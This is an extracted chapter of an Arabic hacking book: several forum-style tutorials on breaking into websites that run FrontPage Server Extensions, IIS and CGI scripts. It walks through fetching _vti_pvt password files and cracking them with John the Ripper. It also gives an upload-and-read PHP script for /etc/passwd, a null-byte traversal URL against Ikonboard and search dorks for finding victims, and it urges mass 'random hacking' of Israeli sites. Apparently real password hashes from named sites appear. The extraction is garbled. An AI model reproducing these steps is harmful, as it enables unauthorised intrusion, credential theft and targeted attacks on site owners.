.> )T.O.L. ( DeXXa<ةةةةةة:

ما الذي يجب أن تعرفه قبل قراءة هذا الدرس :

* اللمام بالنجليزية . و ليس كيفية اختراقه . FrontPage Server Extensions* قراءة المزيد عن الـ

. Microsoft Office FrontPage* كيفية التعامل مع برنامج . CHMOD* كيفية التعامل مع الـ . Telnet* كيفية التعامل مع الـ

. HTTP* كيفية التعامل مع بروتوكول . SQL* كيفية التعامل مع قواعد البيانات العلئقية

Server Side Scripting* كيفية التعامل مع أحد لغات الويب و التي تعمل بناحية الخادم Language .

و اذكر أخيرا بأني اؤمن بأن المخترق ما هو إل انسان وظيفته البرمجة و ادارة و تحليل النظم و الشبكات وليس انسان همه هو معرفة القليل

من المور التي تساعده في التخريب و العبث بما تعب به الخرون و تضييع الوقت في الدردشة و التسكعبمقاهي النترنت ، و لذا فافترض بأن . Screen Captureما أقوله سيكون واضحا و ل يحتاج لـ

@ خريطة الموضوع :

. ما الذي ستسفيده عند قراءة الموضوع ؟ . مقدمة

؟ FrontPage Server Extensions. ما هو الـ ؟ FrontPage Extension Server. ما هي آلية عمل الـ

FrontPage Extension Server. كيفية التصال بـ أم ل FrontPage. كيفية معرفة هل الموقع يدعم الـ

. كيفية استغلله ليصبح في صلحك

@ ما الذي ستستفيده عند قراءتك للموضوع ؟

. FrontPage Server Extensions* ستعرف ما هو الـ * آلية عمله .

* كيفية جمع المعلومات الخاصة بأي موقع . * بعض الطرق للستفادة منه عند التصال بالخادم الخاص به .

@ مقدمة :

تسعى شركات التسكين بأنواعها توفير شتى شبل الراحة لعملئها ، فتجدهم يقدمون العروض و التخفيضات و PHPلرضاء العملء مثل دعم لـ

CGI و Perl و SSL و FTP و SQL .

Microsoft فإن البرنامج المفضل لهم لتصميم مواقعهم هو Webmastersو بالنسبة لمدارء المواقع Office FrontPage و الذي كما هو مبين يأتي

162

Page 163: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

، اذ يتميز بسهولة استعماله كما انه يوفر بعض البرمجيات مثل عداد الزوار ، و لذا تقدمOfficeمع حزمة شركات التسكين دعم كامل للبرنامج .

؟ FrontPage Server Extensions@ ما هو الـ

( ملحظة : سأتكلم حاليا عن الحزم التي أتت بعد حزمة الصدار الثاني )

الخاص بشركة التسكين التي لها قالبيةServerهو عبارة عن حزمة من البرامج يتم تثبيتها في الخادم لدعم بعض الخصائص .

و عند التثبيت يجب انشاء عدة مجلدات منها :

_/private _/vti_bin _/vti_cnf _/vti_log _/vti_pvt _/vti_txt

و سأتكلم عن وظيفة كل مجلد يهمنا :

: vti_bin* المجلد _

و يتواجد بداخله مجلدان هما :

) vti_bin( ملحظة : النقطتان تشيران إلى المجلد _

_/..vti_adm /_/..vti_aut /

الثاني ل يهمنا بقدر ما يهم المجلد الول اذ أنه الخاص بالمشرف ول تستطيع الستفادة منه اذا لم تحصل علىكلمة المرور الخاصة به .

كما يوجد ملفان هما :

/..shtml.exe /..fpcount.exe

: vti_pvt* المجلد _

و يتواجد بداخله عدة ملفات ما يهمنا منها هو الملفات التالية :

DES : و فيه يتواجد المعرف و كلمة المرور الخاصة بالمشرف مشفرة بمقياس service.pwd- الملف .

. authors : و فيه يتواجد المعرفين من مشرفين و service.grp- الملف : و فيه يتواجد مسارات الملفات التي تم تحميلها علىdoctodep.btr و deptodoc.btr- ملفي

الخادم ، فاذا قمت بتنزيله فتستطيع معرفة الملفات الموجودة بالموقع .

يقومhtaccessو في الغالب ل تستطيع معاينة محتويات المجلد اذ يوجد في المجلد الرئيسي للموقع ملف .بمنع الجميع ( المالك و المجموعة و

163

Page 164: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

الزوار ) من معاينة المجلد و محتوياته .

( ملحظة : ان عدم وضع أي صلحية على المجلدل يعني بأنها تعتبر ثغرة و لكن ضعف من الناحية )

: private* المجلد _

. htaccessو يتواجد بداخله ملف واحد فقط هو .

؟ FrontPage Extension Server@ ما هي آلية عمل الـ

. HTTP على بروتوكول الـ FrontPage Extension Serverيعتمد التصال بين العميل و الـ

للخادمRequest فانه يتم ارسال طلب FrontPageفلو اردنا معاينة عداد الزوار عن طريق برنامج الـ FrontPage Extension Serverثم يمرره الخادم بالـ

، و من ثم يكرر تمريره مرة أخرى إلى الـfpcount.exeو الذي يمرره بالتالي ببرمجيات الخادم مثل Extension Server و إلى الخادم و يظهر المخرجات

لـ العميل ، علما ان هذه التصالت تتم عبر جدار نار .

: FrontPage Extension Server@ كيفية التصال بـ

وFrontPageكما ذكرنا سابقا ان أغلب شركات التسكين تسعى لراحة العملء ، فتجدها تدعم خدمة الـ ذلك لتحميل الصفحات للموقع علما بأنها

و تحميل الملفات و انشاء المجلدات عبر المتصفح اعتمادا على البرمجيات التيFTPتدعم بروتوكول الـ تعمل بناحية الخادم .

: FrontPage Extension Serverو الن قم بتنفيذ التالي لمعرفة كيفية التصال بالـ

و التي ل تختلف أبدا عن الحزم الباقية إل في بعض النقاطXP( ملحظة : سأتكلم حاليا عن حزمة الـ الشكلية )

. Office و الذي يأتي مرفقا مع حزمة FrontPage* قم بتشغيل برنامج الـ . Open Web قم باختيار File* من قائمة

* قم باضافة المعرف و كلمة المرور ( الصلية و ليست المشفرة ) . * اذا كانت صحيحة سيظهر لك الخادم ملفات الموقع كلها و عندها تستطيع التحميل و التعديل في الملفات و

المجلدات و معاينة الشفرة المصدرية للملفات .

* اذا لم تتم العملية بنجاح فهذا يعني بأن الموقع ل يدعم الخدمة أو أن المعرف أو كلمة المرور خاطئة ويطلب منك معاينتها في وضعية القراءة و ل

يظهر لك الشفرة المصدرية الصلية ول المجلدات و الملفات التي يحويها الموقع .

أم ل : FrontPage@ كيفية معرفة هل الموقع يدعم الـ

يوجد العديد من الطرق لمعرفة قابلية الموقع لدعم الفرونت بيج نذكر منها :

* معاينة ملف نجاح التثبيت :

و لكن هذا ل يعني أن الموقع ل يدعم الخدمة ، كما أنه لvti_inf.html( ملحظة : قد ل تجد ملف _يعتبر ثغرة )

أم ل . FrontPage- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ، مثال : vti_inf.html- قم بمعانية ملف _

164

Page 165: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

http://www.Victim.com/_vti_inf.html

، فهذا معناه أنFrontPage Configuration Information- و عند معاينة الصفحة ستجد جملة قد تم تثبيتها FrontPage Extension Serverحزمة الـ

في الخادم بنجاح .

و لمعرفة اصدارة الخدمة قم بالتالي :

. Source Code- قم بالنقر بزر الفأرة اليمن على الصفحة ، ثم قم باختيار تشير للصدار الخاص بالخدمة . Version" حيث FPVersion="Version- قم بالبحث عن

: vti_cnf* عن طريق مجلد _

أم ل . FrontPage- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ - قم بمعانية المجلد بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ، مثال :

http://www.Victim.com/_vti_cnf

. Source Code- قم بالنقر بزر الفأرة اليمن على الصفحة ، ثم قم باختيار - قم بالبحث عن الشفرة التالية :

vti_generator:Programe

Microsoft يشير لنوع البرنامج و اصدارته و سيكون في حالتنا هو Programe- حيث FrontPage X و الصدارة الخاصة به هي X .

* الكشف عن الشفرة المصدرية للصفحة :

أم ل . FrontPage- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ . Source Code- قم بالنقر بزر الفأرة اليمن على الصفحة ، ثم قم باختيار

> عن الشفرة التالية : Head></Head- قم بالبحث بين ترميزي الرأس <

>Meta Name="GENERATOR" Content="Programe <"

يتبينMicrosoft FrontPage X.0 يرمز لنوع البرنامج و اذا كان البرنامج هو Programe- حيث لنا بأن الخادم الخاص بالموقع يدعم الفرونت بيج و

. Xالصدارة الخاصة به هي

: NetCraft* عن طريق موقع

. NetCraft.net- قم بزيارة الموقع :// . http- قم بكتابة عنوان الموقع مستثنيا الـ

- انتظر بضع ثواني . - ستجد أن الموقع أعطاك بعض المعلومات عن الملقم و الخدمات الموجودة في الموقع الذي تريد معرفة

قابلية دعمه للبرنامج ، و من تلك الخدمات يرمز لصدارة الـX حيث mod_frontpage/X و ستظهر لك بالشكل FrontPageخدمة الـ

FrontPage Extensions Server .

: Telnet* عن طريق الـ

165

Page 166: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

( ملحظة : تساعد هذه الطريقة في معرفة بعض المعلومات عن الخادم و المخرجات هي نفس مخرجاتالطريقة السابقة )

. Telnet و اكتب بالنافذة التي ستظهر Run قم باختيار Start- من قائمة بالشكل التالي : 80- قم بالتصال بالموقع عبر المنفذ

Microsoft Telnet> Open www.Victim.com 80

. Head هي Method للخادم و لتكن الطريقة Request- قم بارسال طلب

) HTTP( ملحظة : عليك اللمام بكيفية التعامل مع بروتوكول

هو البروكسيISP.net هو الموقع الضحية و http://www.Victim.net- قم بارسال التالي حيث الخاص بمزود الخدمة الخاص بك :

Head www.Victim.net HTTP/1.1 Host: ISP.net

Accept */* :Connection: close

- انتظر بضع ثواني . مثل تاريخ آخر تعديل للصفحةServer عن الطلب الذي ارسلتهب للخادم Response- ستستلم الجابة

و نوع الملقم و الخدمات المتوفرة به . وFrontPageو من ضمن الخدمات ستجد نفس الذي وجدناه في الطريقة السابقة و هو أن خدمة الـ

mod_frontpage/Xستظهر لك بالشكل . FrontPage Extensions Server يرمز لصدارة الـ Xحيث

@ كيفية استغلله ليصبح في صالحك :

قم بالتالي : vti_pvtاذا عثرت على موقع يدعم هذه الخدمة و لم يتم وضع صلحيات على مجلد الـ _

، كما أن على الموقعPHP( ملحظة : عليك اللمام بلغة تعمل على ناحية الخادم و في حالتنا فهي الـ الضحية دعم هذه اللغة )

* قم بالتصال بالموقع الضحية . و ضمنه التالي : PHP* قم بتحميل ملف ينتهي امتداده بـ

?>PHP

$open = FOpen($file, "r ;("$get = FGets($open, FileSize($file ;((

Echo $get ;

FClose $open ;

<?

166

Page 167: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

للخادم يقوم بفتح ملف غير معين ثم يحضر محتوياته على حسب حجمه بالبايتPHPو قمنا هنا برفع ملف ثم يعرضه ثم يغلق الملف ، و الن كل

ما عليك فعله الن هو الدخول على الموقع عبر المتصفح و الحاقه بـ بعنوان الملف الذي حملته و المتغيرfile و الملف الذي تريد معاينة الشفرة

المصدرية الخاصة به ، مثال :

http://www.Victim.com/uploded_file...../../etc/passwd

يشير لسم الملف الذي قمت بتحميله ، و تستطيع اضافة اوامر تسمح لك بمعاينةuploded_fileحيث الملفات و المجلدات الموجودة في الخادم .

انتهى،،،

167

Page 168: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

" اختراق المواقع التي تدعم الفرونت بيج "

<ةةةةة ةة ةةةةة ةةةةة><ةةةةةة: ةةةةةة>

اكثر منا يعلم ان هذه الثغرة خاصة بنظام//

NT - Unix

أم ل؟frontpage- وسف أقوم الن بشرح طريقة لمعرفة هل هذه المواقع تدعم 1

بعدة طرق ولن أذكر إل السهل:

netcraft- بالذهاب إلى موقع http://www.netcraft.com/

وكتابة اسم الموقع وبعد البحث سوف يظهرmod_frontpage/x

x(رقم الصدار الخاص بالفرونت بيج)=- عن طريق إضافة جملة

vti_inf.html/_/http://www.almodammer.comبعد عنوان الموقع لنفرض أن الموقع:

نضيف الجملة ليصبح بهذه الطريقةhttp://www.almodammer.com/_vti_inf.html

Enterوبعدها اضغط وراح يطلعلك في أول الصفحة هذه الكلمة

Frontpage Configuration Informationأي قد تم تثبيت مجلدات وبرامج الفرونت بيج

- وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم ل بإضافة

vti_cnf/_بعد عنوان الموقع كهذا المثال:

http://www.almodammer.com/_vti_cnfواضغط زر الفأرة اليمن واختار

sourceالمصدر وابحث عن

vti_generator:Programeحيث

Programeتعني لنوع برنامج الفرونت بيج والصدارات الخاصة به

--------------------------------------------------

كيف نقدر نوصل لملف الباسوورد؟frontpage- ألحين وعرفنا الموقع يدعم 2 واعلمكfrontpageبسيطة إنت هات الموقع الي يبدعم

يعني وعلى سبيل المثالhttp://www.almodammer.com/

_vti_pvt طيب نذهب إلى ملف fontpageيدعم كذا يعني

http://www.almodammer.com/_vti_pvtوأول ماندخله نلحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:

168

Page 169: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

=============Adminstrator.pwd

Adminstrators.pwdService.pwd

Users.pwdUser.pwd

Author.pwd=============

ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلحظ نلحظ وجود username:passwdاسم المستخدم والباسوورد

يحتوي علىserviceيعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف user / password

وهذا مضمون الملفoperator:hi9LHn9wAMuKM

operatorحيث اسم المستخدم:hi9LHn9wAMuKMالباسوورد المشفرة هي:

ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إل نفك تشفيرهوهذا يتم ببرامج كثير

)=Crack Jack=()=John The Ripper=(

راح نستخدم الفضل والكثر تداول وهو John The Ripper

لتحميل البرنامج من هذا الموقع::http://www.openwall.com/john

كيف تفك التشفير بهذا البرنامج

أول شي تروح تنقل البرنامج إلى مجلد:\c

RUNبعدين تفتح مجلد وتضع فيه كلمة السر الي تبي تفك تشفيرهاpasswd وتسمي الملف txtوتسويلك مستند نصي

إذهب إلى startابدأ

runتشغيل اكتب المر

command وبعدها راح يفتح Enterاضغط على

DoSإطار الـRUNاذهب إلى مجلد

وذلك بالخروج من المجلدات الي راح تظهر لك واذا تبي تطلع من أي مجلد استخدم المر..cd

حتى توصل :\>c

بعدين اكتبcd john Enterاضغط على

169

Page 170: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

وراح يظهر لك بهذا الشكل>c:\john

واكتب cd RUN

وبتدخل المجلد ليصبح بهذه الطريقة>c:/john/RUN

John The Ripperألحين نكتب أوامر برنامج وهي

====john -i:all passd.txt--------------------------

يبحث لك عن جميع النواع والحتمالت

====john -i:Alpha passwd.txt ----------------------------------

يبحث عن الحرف الصغيرة

====john -i:Digits passwd.txt ----------------------------------

يبحث عن الرقام

====john -single passwd.txt ---------------------------------

أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم

--------------------------------------------------------------------------------وبعد ماتجرب كل هذي الوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ول ل إذهب إلى

john.potالموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها

--------------------------------------------------------------------------------

password والـusernameإنت ألحين مستريح عندك وش بقالك ؟!!

يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/)1(

frontpageبعدين

fileوتذهب إلى open webوتضيف

السم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك

)2(FTPمن

المنتشرة FTPوعليك ببرامج الـws-ftpكالـ pro ftpوالـ

170

Page 171: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

والمزيد ... ولكن البرامج أسهل لك وأضمن لكDOSويمكنك عمل الطريقة من

======================================

googleوألحين أكيد تبون تجربون على موقع أقولكم روحوا http://www.google.com/

واكتبوا في إطار البحثvti_pvt/_

وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة

وعندك محرك بحثhttp://www.altavista.com/

تكتب في محرك البحثlink:service.pwd

أو..link:adminstrators

فيها.passwordوغيرها من الملفات الحتمال وجود

انتهى،،،

171

Page 172: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

" الختراق العشوائي "<ةةةةة>

<ةةةةةة: ةةةةةةة>

Random Hacking- ماهو الـإختراق العشوائي CGIScripts- تطويره بحيث يصبح يبحث على إستثمارات غير الـ

- كيف تستغل اي ثغره بعد الحصول عليها

Random Hacking- ماهو الـإختراق العشوائي هو البحث في كميه كبيره من المواقع عن ثغره محدده ، وهذا سهل ويعود بمواقع كثيره جدا جاهزه للختراق

أو العناكبspiders، مثال بسيط جدا ، روح على محرك بحث ، من محركات البحث التي تعتمد على الـ ، (إرجع لشرح زورو في رياضيات البحث) مثلlink:xxxx.cgi or pl وأكتب altavista.comمثل

المواقع المردوده لك نتيجه للبحث كلها تملكhelp.cgi ، link:help.cgiنبحث عن لنك لملف بإسم عن السكربت الذي بحثت عنهHTML ، إفتح واحد منها وأبحث في المصدر الكود Ikonboardمنتدى

help.cgi لتعرف اين مكانه ، لنفرض مكانه هنا http://www.example.com/cgi-bin/help.cgi

?http://www.example.com/cgi-bin/help.cgiأكتب بعد الملف غير العنوان ليصبح helpon=../members/[member].cgi%00

] بإسم عضو وبدون القوسين [] طبعاmemberمع ملحظه تغيير [ Ikonboardسوف يعرض لك معلومات العضو كامله ومن ظمنها كلمة المرور وهذه الثغره لـ المنتدى

وهذا ليس لب موضوعي ولكن هي بدايه ومثال ل تحفظه لني أحضرت أبسط مثال فقط فيوجد غيره2.1.7 url تملك ثغرات مثل هذه واغلب إستثماراتها تكون من خلل CGIScriptمئات بل آلف ملفات الـ

للحصول على مثل هذه الستثمارات لثغرات ملفات السي جي آي سكريبت شوف الرشيف هذا وهو لغته أو الستثمارExploitروسيه أعتقد ولكن ما يهم لننا نبحث عن الـ

http://www.secure.f2s.com/eng_ver/bugs/ / وتشوفhttp://www.securiteam.comوممكن تأخذ إسم المنتج مثل وتضعه في محرك البحث لـ

النتائج ، أو تشترك في القائمه البريده لـ سيكيورتي فوكس فهي مفيده جدا أنا شاركت من قبل فتره وجدا أعجبت بها وهي مختصه في المن وليس لـثغرات السي جي آي سكربت ، يعني امن واخبار وكل شئ ....

ويوجد برنامج تقدمه سيكيورتي فوكسي بإسم سيكيورتي فوكس بيجر ، هو برنامج لتسهيل عمليه الحصولعلى الخبار ووو...الخ

CGIScripts- تطويره بحيث يصبح يبحث على إستثمارات غير الـ الختراق العشوائي إذا كان فعل عشوائي ، يعني تخترق اي موقع ولو بدون سبب فهذه همجيه !! ، لكن

ممكن نستفيد منه إحنا في أنه ما يكون في شكل همجي ، أنا اقول لك كيف ، مثل إسرائيل اللي الكل يكرهها ، الذين يأمرون الفلسطينيين بأوقاف إطلق النار :) ، الكل يكرههم ليس لجل أنهم يهود ، ل نكرههم لنهم

1104 و co.il تنتهي بـ sites 12610ظلموا فلسطين ، عندهم موقع فيه آلف من مواقعهم هذا هو sites تنتهي بـ org.il 70 و sites تنتهي بـ ac.il 78 و sites تنتهي بـ .gov.ilوهذه مهمه ، و

54 sites تنتهي بـ .net.il 29 و sites تنتهي بـ .muni.il 2009 و sites تنتهي بـ comو ، 137 sites تنتهي بـ .net و org - 121 sites و .edu - 4 sites ، لعينه .israel.net - 84

sites و .il - sitesعشان تحصل على كل هذه السايت روح الموقع هذا........ . http://iguide.co.il/sites/sites.htm

وفيه كمان محركات بحث

http://www.achla.co.il/http://www.reshet.co.il/data/index.vs?dw=1

http://www.maven.co.il/http://www.tapuz.co.il/http://www.walla.co.il/

172

Page 173: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

http://www.info.gov.il/find.pl

altavista.co.ilوفيه محرك أعدم منها واللي هو

المهم على كل شخص منا أن يصلح فرز للبيانات الموجوده في هذه المواقع ، يستخدم اللغه التي يتقنهاليصنع برنامج يصلح فرز ويضعها في ملف تكست بدون اشياء ثانيه معها

/ ، الطريقه سهله جدا ، أول يتم الشبك معw3-msqlالعمليه الثانيه هي البحث فيها كلها عن منتج ، مثل ، مثل ترسل للبروكسي GET وثم يرسل له أمر proxy.isp.net.sa :8080بروكسي مثل

GET http://www.com.il/cgi-bin/w3-msql/ HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg*/* ,

Accept-Language: ar-saUser-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98(

Host: www.com.ilProxy-Connection: Keep-Alive

-cgi/ ، يتضح طلبنا لـ http://www.com.il/cgi-binوهو يطلب من البروكسي أحضار الموقع bin/w3-msqlفي الحقيقه ل نبحث عن ثغرات سي جي آي ، ولكن نبحث عن كل المواقع التي يوجد ، /

، يعني المواقع السرائليه مثل التي جمعناها في ملف تكست كلها تأخذ واحدWWWMSQLبها المنتج وثم يحفظcgi-bin/w3-msqlواحد وتدخل في البرنامج الذي صممناه وترسل الى البروكسي بحثا عن

رد البروكسي في ملف خارجي ، وهكذا حتى ننتهي من كل المواقع ، وثم نفتح الملف ونشوف التي تم إيجاد داخها والتي لم يوجد ، ونتوجه الى سيكيورتي فوكس وال سيكيورتي تيم وال أيWWWMSQLالمنتج

يمكن تطبيقهw3-msql لـ Exploit ، مثل في سيكوتي تيم نجد w3-msqlموقع يعجبك وابحث عن http://www.securiteam.com/exploits/2WUQBRFS3A.htmlمن المتصفح ، وهو هنا

يعني إختراق عشوائي ،Random Hackingطريقه فحص عده مواقع بحثا عن منتج فيها أسميها انا في المواقع السرائليه فأنا أقول لك بأنك ما راح تلقى كثير أو لن تجدw3-msqlولكن لو فعل بحثت عن

/ لترصد كل المواقع التي فيها فرونت بيج ، وطبعا بعد ما يتم حفظ كلvti_pvtشئ ، ممكن تبحث عن /_ html عشان كذا أنت خل الملف يكون بنسق *.HTMLالمعلومات المسترجعه من البروكسي تكون بشكل

والليThe page cannot be displayedوافتحه وتجد كل المواقع ، اللي كتب عنها ..Forbddien.... واللي not foundالخ ، من هذه الردود تعرف اللي نت فاوند وال موجود ولكن....

غير مسموح بالوصول له ..الخ بهذه الطريقه تعرف اللي موجود عليه واللي مو موجود .....والباقي عليك

- كيف تستغل اي ثغره بعد الحصول عليها وما عرفت تشغله أو قابلت فيه أخطاء فممكن تبحث عن فرجونc ما يبغا لها فلسفه ، كود urlإذا كانت

في ويندوز وتحدثنا عنها في كوكبBatch وهو الذي يقابل Shell *.sh أو perlثاني لـه ولكن بلغه بلغهexploit إذا كان الـ perl exploit.plلغات البرمجه ، من الدوس بعد ما تثبت أكتيف بيرل أكتب

بيرل ولكن طبعا فيه أشياء تغييرها في الكود نفسه ، وهذه الشياء تكون مكتوبه بين علمات التعليقات :) وأكيد بتواجه مشاكل إذا ما تعرف شئ في بيرل ، في هذه الناحيه ل تطلب شرح بالصور :) إذا رجع لك رد

perlطويل ما قدرت تقراه ممكن تحفظ الخرج عن طريق علمة < وثم مسافه وإسم الملف مثل exploit.pl > log.htm

كتب في الصدار أربعه وممكنExploitوبالنسبه للمنتج أكتيف بيرل فقط تواجه فيه مشاكل ، لن بعض الـ خمسه وممكن ما يعمل زين في أكتايف بيرل لذلك قد تضطر لتغير المفسر عندك أو تعدل في الكود وهذا كله

)فيه مفسر بيرل ممتاز جدا افضلRedHat 6.2يطلب خبره في اللغه ، وعلى فكره ليونكس (أعمل على من أكتيف بيرل بعشرات المرات.

انتهى،،،

173

Page 174: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

" الطريقة الصحيحة والمثلى في اختراق المواقع "

<ةةةةة> >marwan911<ةةةةةة:

اول خطوة في الختراق واللي هي اخذ المعلومات

يعني نعرف الموقع الفلني شنهو الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها.

الملقمات اشهرها اثنين

IIS (ومواقع قليل مقفلة ثغراتها) .من مايكروسوفت وهذه مليانة ثغرات :

apache .من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب :

طيب

الحين عندنا موقع

وشلون نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها

http://www.netcraft.netعندك الموقع

ادخله

تلقي مربع

هنا تحط فيه الموقع اللي تبي تعرف المعلومات اللي فوق

whitehouse.orgمثل نحط موقع البيت البيض اللي هو

:// ول / اللي بالخير httpملحظة: نكتبه من غير

http://uptime.netcraft.com/up/graph....whitehouse.org

راح يطلع لنا التالي

The site www.whitehouse.org is running Microsoft-IIS/5.0 on Windows 2000 طيب

الحين عرفنا معلومتين مهمتين

IIS5.0اول شيء انه شغال على الملقم

2000ثاني شيء شغال على نظام ويندوز

حلو

174

Page 175: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

عليه (راح احطها بعد الموضوع) IIS5.0اول شيء نجرب ثغرات

(راح احط الموقع بعد الموضوع) 2000إذا مانفع شيء نشوف ثغرات نظام ويندوز

طيب

الحين فيه حاجة اسمها يوني كود

هذه تخترق فيها عن طريق المتصفح

وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع. راح احط امثلةIISوماتمشي إل مع ملقمات عليها.

طيب لنفرض انه ماطلع فيها ثغرات؟

نشوف محتويات الموقع نفسه

نشوف إن كان عنده سجل زوار او منتدى او او او ونطلع ثغراتها من الموقع اللي راح ارفقه في الرد الليبعد الموضوع.

طيب لو كان السيرفر اباتشي؟

www.arank.comخلونا ناخذ مثال موقع ارانك

لو حللناه بالنيت كرافت راح نشوف النتيجة التالية

The site www.arank.com is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6

mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux

طيب هنا يهمنا ثلث اشياء

وهذه مليانة ثغراتFrontPage/5.0.2.2510 و دعم فرونت بيج apache 1.3.20الملقم وهو Linuxوالثالث النظام وهو

طيب

الملقم

اول شيء اباتشي من الملقمات الصعبة الختراق إل بعض الصدارات منها فنحط هذه على جنب.

نشوف دعم الفرونت بيج

زي ماقلنا الفرونت بيج مليان ثغرات

وثغراته قوية وكثيرة تقريبا

هذه اللي نحتاجها غيره مامنه فايدة private و _vti_pvtمنها مجلد _

175

Page 176: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

authors.pwd و users.pwd و service.pwdداخل المجلدين راح نلقي اربع ملفات مهمة وهي ويعتبر هذا اخطر ملف adminstators.pwdو

% من المواقع الموجودة70طيب لو قدرنا ننزل واحد من الملفات هذه (ملحظة الثغرة هذه موجودة ب عالنت) لو نزلناها نفتحها بالمفكرة ونلقي السطر هذا على سبيل المثال

goodyco:CalXS8USl4TGM

http://www.goody.com.sa/_vti_pvt/service.pwdوهذا من موقع قودي

CalXS8USl4TGM اليوزر والباسس مشفر واللي هو goodycoطيب الحين

john the repaierوشلون ينفك؟ ينفك ببرنامج اسمه

تنزله وتحط الملف المشفر (مع اليوزر) بمجلد واحد وتفتح الدوس وتروح لمجلد جوهن وتكتب السطر التاليjohn -i PASSWORD.FILE

وعاد استناه يطلع لك الباسس

طيب نروح للفقرة الثالثة واللي هي النظام

زي ماشفنا النظام هو لينكس

لكن لينكس ايش؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر

لكن هنا راح تواجهك مشكلتين

واكتب عنوان الموقع يطلع لك النظام فوقtelnetاول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ول نوعه وإصدارته

المشكلة الثانية لزم يكون عندك لينكس اصل

وهذه ماتشتغل إل عاللينكس فقط cعلشان ثغراته بلغة ال

================

http://neworder.box.sk (فوق بالمربع اللي عاليمين) هذا الموقع مفيد جدا تكتب مثل /IISاو apache او منتدى واصدارته او اي برنامج ويطلع لك ثغراته

http://www.ussrback.com الموقع هذا خطير جدا جدا تروح ل /EXPLOITSاللي عاليسار وperl و cوتختار اول اختيار هنا ثغرات جميع النظمة من لينكس و ويندوز و و و الخ.. ومنوعة من

يوني كود.

انتهى،،،

176

Page 177: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

" " نبذه يسيرة ومبسطة عن كيفية اختراق المواقع

<ةةةةة ةة ةةةةةةة ةةةة ةة><ةةةةةة:

ركز معي هذا سؤال يحير الجميع بالذات المبتدئين . عليك بأتجاه للموقع المراد اختراقه

حيث يجب عليك دراسة الموقع كامل من حيث عدة عوامل اهمها

- ) نظام السيرفر والمستخدم في الموقع وينقسم السيرفر الى نوعين 1

( اي اي اس ) IISا ) - النوع الول هو

( اباشي ) apachcب ) - النوع الثاني

- ) ملحظة وجود محرك بحث في الموقع ام ل 2

- ) معرفة وقت الذروه لزوار الموقع ووقت الخمول 3

- ) معرفة اليبي للموقع 4

تقريبا هذه اهم العوامل المتخذه كعوامل مطلوبه جدا لتنفيذ العمليه وهذه تاخذ

وقت حيث ان كل شي مايجي بالساهل

والداعم لبعض المواقع وهذا امره تقريبا سهل حيث ان IISسبق وذكرنا السيرفر

اغلب من يستعمل هذه الطريقه هم من الهواه

حيث ان ثغرات تقريبا سهله واختراقها ايضا مرتبط بأن تكون الثغرات التي لديك

جديده و طااازه

وشوية صبر بالستعانه بال ثم ببعض البرامج المساعده وسوف تححق نجاحاتك بأذن ال .

وهذا السيرفر قوي جدا وغالبا ل يعمل على البحث عن ثغراته apachcسيرفر

سوى المحترفون . لنه يتطلب عدة امور ل يستطيع عملها ال من له خبره

بنظام ليونكس ويعرف بعض لغات البرمجه .انتهى،،،

177

Page 178: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

" (<س&ج>) في اختراق المواقع للمبتدئين "

<ةةةةة ةة ةةةةة ةةة ةةة><ةةةةةة: ةةةةةة ةةةةةة>

س*: السلم عليكم أخي القناص العربي:)Dج*: أهلين القناص العربي المزيف :

س*: أحم أحم , أنا كنت عايز أسألك شوية أسألة في الهاكنج.ج*: تفضل حبيبي , بس ياريت ماتكون عن اختراق الجهزة , ولعب العيال هذا !!

س*: ل ل , أنا تطوت كثير :)ج*: أوكى تفضل :)

: لقد سمعت كثيرا عن ثغرات الفرونت بيج , هل يمكنك توضيح طريقة استخدام هذه الثغرة .2سD: بالتأكيد حبي ومن عيوني الثنين :2ج

